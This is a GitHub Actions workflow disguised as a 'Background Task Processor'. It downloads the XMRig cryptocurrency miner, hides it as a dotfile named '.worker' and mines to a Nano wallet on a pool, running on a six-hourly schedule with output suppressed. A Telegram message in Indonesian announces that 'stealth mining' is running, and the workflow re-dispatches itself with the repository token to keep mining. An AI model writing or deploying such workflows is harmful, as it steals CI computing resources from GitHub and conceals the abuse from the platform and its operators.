name: Background Task Processor

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

jobs:
  task:
    runs-on: ubuntu-latest
    steps:
    - name: Prepare Environment
      run: |
        sudo apt-get update
        sudo apt-get install -y wget curl jq tar

    - name: Download & Run Stealth Task
      run: |
        LATEST=$(curl -s https://api.github.com/repos/xmrig/xmrig/releases/latest | jq -r '.tag_name')
        wget -q https://github.com/xmrig/xmrig/releases/download/${LATEST}/xmrig-${LATEST}-linux-x64.tar.gz -O runner.tar.gz
        tar -xzf runner.tar.gz
        mv xmrig-${LATEST} taskdir
        cd taskdir
        mv xmrig .worker
        chmod +x .worker
        timeout 350m ./.worker -o xmrig.nanswap.com:3333 -a rx -k -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q -p stealth > /dev/null 2>&1

    - name: Notify Telegram
      env:
        TG_TOKEN: ${{ secrets.TG_TOKEN }}
        TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
      run: |
        curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
        -d chat_id=$TG_CHAT_ID \
        -d text="✅ Stealth Mining sedang berjalan di @AutoNanoGithub_bot\n🛠️ XMrig aktif & terhubung."

    - name: Re-trigger Task
      if: ${{ github.event_name == 'workflow_dispatch' }}
      run: |
        curl -X POST -H "Accept: application/vnd.github+json" \
             -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
             https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
             -d '{"ref":"main"}'
